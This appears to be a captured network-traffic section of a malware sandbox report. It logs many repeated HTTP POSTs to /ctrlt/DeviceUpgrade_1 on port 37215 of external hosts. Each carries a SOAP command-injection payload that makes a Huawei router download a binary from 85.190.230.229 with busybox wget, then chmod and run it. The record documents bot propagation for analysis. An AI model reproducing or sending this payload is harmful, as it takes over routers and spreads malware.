                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:16.777960062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:29.833100080 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:56.712094069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      2192.168.2.144261641.17.200.15137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.605967999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.298187971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      3192.168.2.145135841.153.135.19837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.607300043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234169006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      4192.168.2.1446382197.189.165.14837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.608680964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.266149044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.034277916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.538017988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 